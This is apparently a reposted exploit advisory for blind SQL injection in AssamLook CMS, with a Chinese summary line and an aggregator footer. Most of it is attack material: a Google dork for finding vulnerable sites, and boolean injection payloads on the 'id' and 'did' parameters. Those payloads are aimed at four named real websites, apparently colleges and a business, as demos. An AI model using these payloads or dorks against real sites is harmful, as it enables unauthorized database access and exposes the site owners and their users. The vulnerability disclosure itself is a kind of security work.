AssamLook CMS 存在盲 SQL 注入漏洞,攻击者可通过 `id` 或 `did` 参数构造恶意 URL 实现攻击。该漏洞已在多个站点中被验证,并可通过 Google Dork `intext:"Powered By Assamlook.com"` 检测目标站点。 2025-5-1 18:25:21 Author: cxsecurity.com(查看原文) 阅读量:27 收藏
********************************************************* # Exploit Title: AssamLook CMS - Blind SQL Injection Vulnerabilities # Date: 2025-04-30 # Exploit Author: AmirHossein Abdollahi | Mr_Amir_Typer # Google Dork: intext:"Powered By Assamlook.com" # Category: WebApps # Tested On: Windows, Firefox ********************************************************* [+] Vulnerable Parameter: `id` or `did` in URLs with `.php?id=` or `.php?did=` ********************************************************* ### Demo 1: https://rhinoprintopacks.com/product.php?id=53' and 1=1--+ https://rhinoprintopacks.com/product.php?id=53' and 1=2--+ ### Demo 2: https://www.nonoicollege.in/department-profile.php?did=1' and 1=1--+ https://www.nonoicollege.in/department-profile.php?did=1' and 1=2--+ ### Demo 3: https://rahacollege.co.in/department-profile.php?did=3' and 1=1--+ https://rahacollege.co.in/department-profile.php?did=3' and 1=2--+ ### Demo 4: https://www.lumdingcollege.org/view_tender.php?id=108' and 1=1--+ https://www.lumdingcollege.org/view_tender.php?id=108' and 1=2--+ ********************************************************* [+] Google Dork: intext:"Powered By Assamlook.com" ********************************************************* # Discovered by: AmirHossein Abdollahi | Mr_Amir_Typer
Thanks for you comment!
Your message is in quarantine 48 hours.
如有侵权请联系:admin#unsafe.sh